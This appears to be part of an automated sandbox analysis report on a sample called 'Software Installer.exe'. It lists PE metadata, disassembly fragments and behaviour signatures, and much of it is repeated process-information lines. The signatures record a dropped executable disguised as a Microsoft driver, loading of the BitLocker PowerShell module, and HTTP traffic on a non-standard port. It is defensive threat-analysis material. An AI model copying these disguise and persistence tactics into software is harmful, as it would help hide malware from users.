Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656547373.000001D778871000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Drawing.Primitives\Release\net8.0-windows\System.Drawing.Primitives.pdb source: Software Installer.exe, 00000000.00000002.2655816250.000001D778281000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655966920.000001D778340000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653422218.000001D776DA1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653368487.000001D776D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA256v source: Software Installer.exe, 00000000.00000002.2652733750.000001D775080000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmp
Source: Software Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Software Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Software Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Software Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Software Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: Software Installer.exeStatic PE information: section name: .CLR_UEF
Source: Software Installer.exeStatic PE information: section name: .didat
Source: Software Installer.exeStatic PE information: section name: Section
Source: Software Installer.exeStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_00000196DC8F2200 push rcx; retf 0_2_00000196DC8F222B
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_00000196DC8F3638 push rax; iretd 0_2_00000196DC8F3639
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_00000196DE283A7E push rax; iretd 0_2_00000196DE283A81
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D773213E22 push rsi; ret 0_2_000001D773213E4E
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D77321204C push rbp; ret 0_2_000001D77321204D
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D773213520 push rsi; retf 0_2_000001D773213528
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D773214320 push rbp; iretd 0_2_000001D77321432F
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D7751739C6 push rax; retf 0_2_000001D7751739C7
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D775175F63 push rbp; ret 0_2_000001D775175F64
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D776D333EE push rsp; retf 0_2_000001D776D333EF
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D776DA51A5 push rax; ret 0_2_000001D776DA51AF
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D776DA40B8 push rdx; retf 0_2_000001D776DA40C2
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D7775C6856 push rsi; iretd 0_2_000001D7775C686E
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D7775C4B4F push rbp; ret 0_2_000001D7775C4B50
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D7775C5CBC push rsi; retf 0_2_000001D7775C5CBD
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D7775C6B5F push rbp; retf 0_2_000001D7775C6B64
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D7775C3EAF push rdx; retf 0_2_000001D7775C3ED8
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D7775C61A6 pushfq ; ret 0_2_000001D7775C61C8
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777801695 push r12; iretd 0_2_000001D777801697
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D7778016D5 push rcx; retf 0_2_000001D7778016D6
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A23C2C push rbp; iretd 0_2_000001D777A23C2D
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A24C4C push rsp; retf 0_2_000001D777A24C52
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A227E4 push 40DA147Ch; ret 0_2_000001D777A227E9
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A24DF2 push rdi; retf 0_2_000001D777A24DF9
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A23730 push rsp; iretd 0_2_000001D777A23737
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A621AE push rsi; retf 0_2_000001D777A621C3
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777B319A1 push rbp; ret 0_2_000001D777B319A5
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777B34189 push rax; ret 0_2_000001D777B3418A
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777B3527A push rsp; iretd 0_2_000001D777B3528F
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777B33A46 push rcx; retf 0_2_000001D777B33A47
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777EC2175 push A9951FF5h; retn 005Fh0_2_000001D777EC217D
Source: C:\Users\user\Desktop\Software Installer.exeFile created: C:\Users\user\Microsoft_Driver_vs_2019.exeJump to dropped file
Source: C:\Users\user\Desktop\Software Installer.exeFile created: C:\Users\user\Microsoft_Driver_vs_2019.exeJump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Users\user\Desktop\Software Installer.exeFile created: C:\Users\user\Microsoft_Driver_vs_2019.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49727
Source: C:\Users\user\Desktop\Software Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
